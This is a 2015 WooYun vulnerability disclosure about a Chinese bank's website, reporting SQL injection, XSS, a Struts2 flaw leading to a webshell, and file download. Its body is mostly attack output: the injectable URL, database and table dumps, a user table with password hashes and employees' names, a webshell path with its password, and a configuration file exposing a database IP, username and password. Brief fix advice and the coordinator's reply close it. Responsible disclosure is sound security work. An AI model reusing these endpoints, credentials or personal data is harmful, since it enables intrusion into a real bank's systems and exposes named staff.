当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090991

漏洞标题:某银行SQL注入/struts2漏洞

相关厂商:cccb.cn

漏洞作者: sm0nk

提交时间:2015-01-10 11:57

修复时间:2015-02-24 11:58

公开时间:2015-02-24 11:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-10: 细节已通知厂商并且等待厂商处理中
2015-01-15: 厂商已经确认,细节仅向厂商公开
2015-01-25: 细节向核心白帽子及相关领域专家公开
2015-02-04: 细节向普通白帽子公开
2015-02-14: 细节向实习白帽子公开
2015-02-24: 细节向公众公开

简要描述:

getshell

详细说明:

1.注入漏洞
http://www.cccb.cn/front/main.action?des=10&method=view&tranCode=240002&tranType=ajax

2.jpg


available databases [7]:
[*] CTXSYS
[*] EP2WEBSITE
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
Database: EP2WEBSITE
+------------------+---------+
| Table | Entries |
+------------------+---------+
| PUBVISITDAYLIST | 22951 |
| PUBTRANSLOG | 21114 |
| ARTNEWSINFO | 1667 |
| PUBVISITCOUNT | 1431 |
| VOTBOOK | 145 |
| MGZPIC | 77 |
| ARTCOLUMNINFO | 61 |
| PUBPARAM | 57 |
| CONINFO | 52 |
| PUBMENUINFO | 45 |
| MGZINFO | 21 |
| RECWORKRECORD | 17 |
| CYCMENUINFO | 12 |
| CONLINKMAN | 10 |
| RECEDUCATION | 10 |
| RECAPPLICANTINFO | 8 |
| VOTOPT | 6 |
| CONCLASS | 5 |
| RECFAMILY | 4 |
| USERGROUPINFO | 3 |
| USERINFO | 3 |
| CYCUSERINFO | 2 |
| ORGINFO | 2 |
| RECAWARDSINFO | 2 |
| CYCCONSOLE | 1 |
| PUBNOTICE | 1 |
| RECPOSITION | 1 |
| VOTINFO | 1 |
+------------------+---------+
Database: EP2WEBSITE
Table: USERINFO
[3 entries]
+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+
| GID | ORG | FLAG | STATUS | PASSWD | USERCODE | USERNAME | USERPOST | PASSERROR | USERLEVEL | BASEGROUP | LASTLOGINTIME | CURRENTLOGINTIME |
+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+
| 1 | 999999 | 00000000 | 0 | B4BA5283CC2B64521DAFB8248B639882 | admin | admin | NULL | 0 | 00 | 00 | 2015-01-08 10:38:18 | 2015-01-08 10:43:30 |
| 384 | 999999 | 1000000000000000 | 0 | BDE0CE38440C224D5C10497AD365EAE0 | 800433 | 任玉菲 | NULL | 0 | 01 | 01 | NULL | 2014-12-25 09:10:00 |
| 385 | 999999 | 1000000000000000 | 0 | 6D222AADB13C8516C2079486771776EA | 801365 | 吴迪 | NULL | 0 | 01 | 01 | NULL | 2014-12-25 09:10:26 |
+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
Database: EP2WEBSITE
Table: CONINFO
[52 entries]
2.xss

1.jpg


3.struts2
http://www.cccb.cn/front/main.action

3.jpg


http://www.cccb.cn/wooyun.jsp
密码wooyun

6.jpg


config.properties可以找到数据库密码
#database dev service configration
dbUrl=jdbc:oracle:thin:@31.23.36.109:1521:Ep2Web
dbUser=ep2website
dbPass=ep2website
dbSchema=EP2WEBSITE
user_encypt=yes
packagePreName=cn.cccb.appsource
servicePackage=cn.cccb.appsource.service
workunitPackage=cn.cccb.appsource.workunit.app
workapiPackage=cn.cccb.appsource.workunit.api
batchUnitPackage=cn.cccb.appsource.batch
defaultPassword=111111
uploadDir=/home/Ep2Web/uploads
certificatesPath=/home/Ep2Web/certificates</code>
4.任意文件下载

4.jpg


漏洞证明:

2.jpg


1.jpg


3.jpg


6.jpg


4.jpg

修复方案:

1.过滤特殊字符(注入xss类)
2.升级struts2框架
3.访问控制

版权声明:转载请注明来源 sm0nk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-01-15 08:30

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给吉林分中心,由其后续协调网站管理单位处置.

最新状态:

暂无